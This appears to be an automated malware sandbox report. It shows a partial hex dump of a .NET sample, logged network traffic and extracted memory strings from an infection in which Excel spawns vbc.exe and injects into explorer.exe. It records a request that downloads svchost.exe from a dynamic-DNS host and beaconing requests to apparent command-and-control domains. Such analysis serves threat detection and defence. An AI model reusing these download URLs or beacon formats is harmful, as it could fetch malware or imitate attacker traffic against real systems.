00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc e2 0d 00 00 20 00 00 00 e4 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 cc 06 00 00 00 20 0e 00 00 08 00 00 00 e6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0e 00 00 02 00 00 00 ee 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 02 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 98 43 02 00 24 5c 01 00 03 00 00 00 01 00 00 06 bc 9f 03 00 a8 62 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 16 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 70 04 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0
          Source: global trafficHTTP traffic detected: GET /gqx2/?FH=Z6A4l46h&LBbXpL=9/BKDbjWJTW8jFQit4UrkvSCkC6DC2Rftex5RF517dla63TUfiGzTVS9eU2a+MLpIdlY9g== HTTP/1.1Host: www.inreachpt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gqx2/?FH=Z6A4l46h&LBbXpL=kdwz49RbWZyfRfVFqlgC7QJtxuB/meiNTkA5ikaSnjB/7w8EYdi6OSMNUeLU1PJtCjvO1w== HTTP/1.1Host: www.athleteshive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gqx2/?LBbXpL=NDTQX7mapLrAPB2lUlM56Hgg+STWZd9aU5/K481bOg5ERhcI1aoDeCBobL4shdqJetw+0A==&FH=Z6A4l46h HTTP/1.1Host: www.calusaptamiami.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gqx2/?FH=Z6A4l46h&LBbXpL=+3QoYFPEqRNlZMzGaFhuJ6Cz2rhEMAU1T5a3j4/+hda+nWQNJZmKanwic2T+mI2t6bc5xQ== HTTP/1.1Host: www.shuhan.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gqx2/?LBbXpL=3W3cVsor3bbPfna0qFofS9YXWKP/R6dcaODyRhEFOp9LvKZJ8f2uexAIjRYYCLBPm+vppg==&FH=Z6A4l46h HTTP/1.1Host: www.rentfs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gqx2/?FH=Z6A4l46h&LBbXpL=6nuUJCCL996uhukPA9n93qtc4x9+JW7PXVvZwiYzKnuHGI26xL3B8i1MOW2JBaaNxWuU1g== HTTP/1.1Host: www.trijjadigital.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 208.91.197.91 208.91.197.91
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: Joe Sandbox ViewASN Name: HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK
          Source: global trafficHTTP traffic detected: GET /documengt/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sndychnesqudusissnvx.dns.armyConnection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7BFBA2AD.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /documengt/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sndychnesqudusissnvx.dns.armyConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /gqx2/?FH=Z6A4l46h&LBbXpL=9/BKDbjWJTW8jFQit4UrkvSCkC6DC2Rftex5RF517dla63TUfiGzTVS9eU2a+MLpIdlY9g== HTTP/1.1Host: www.inreachpt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gqx2/?FH=Z6A4l46h&LBbXpL=kdwz49RbWZyfRfVFqlgC7QJtxuB/meiNTkA5ikaSnjB/7w8EYdi6OSMNUeLU1PJtCjvO1w== HTTP/1.1Host: www.athleteshive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gqx2/?LBbXpL=NDTQX7mapLrAPB2lUlM56Hgg+STWZd9aU5/K481bOg5ERhcI1aoDeCBobL4shdqJetw+0A==&FH=Z6A4l46h HTTP/1.1Host: www.calusaptamiami.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gqx2/?FH=Z6A4l46h&LBbXpL=+3QoYFPEqRNlZMzGaFhuJ6Cz2rhEMAU1T5a3j4/+hda+nWQNJZmKanwic2T+mI2t6bc5xQ== HTTP/1.1Host: www.shuhan.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gqx2/?LBbXpL=3W3cVsor3bbPfna0qFofS9YXWKP/R6dcaODyRhEFOp9LvKZJ8f2uexAIjRYYCLBPm+vppg==&FH=Z6A4l46h HTTP/1.1Host: www.rentfs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gqx2/?FH=Z6A4l46h&LBbXpL=6nuUJCCL996uhukPA9n93qtc4x9+JW7PXVvZwiYzKnuHGI26xL3B8i1MOW2JBaaNxWuU1g== HTTP/1.1Host: www.trijjadigital.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2180707596.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: sndychnesqudusissnvx.dns.army
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Jan 2021 06:31:33 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Apr 2019 06:05:22 GMTAccept-Ranges: bytesContent-Length: 746Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; marg
          Source: explorer.exe, 00000006.00000000.2194341895.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194341895.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2182699706.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2180707596.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2180707596.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2180887707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2180887707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000006.00000000.2169916528.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2165883965.0000000002301000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2194437832.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
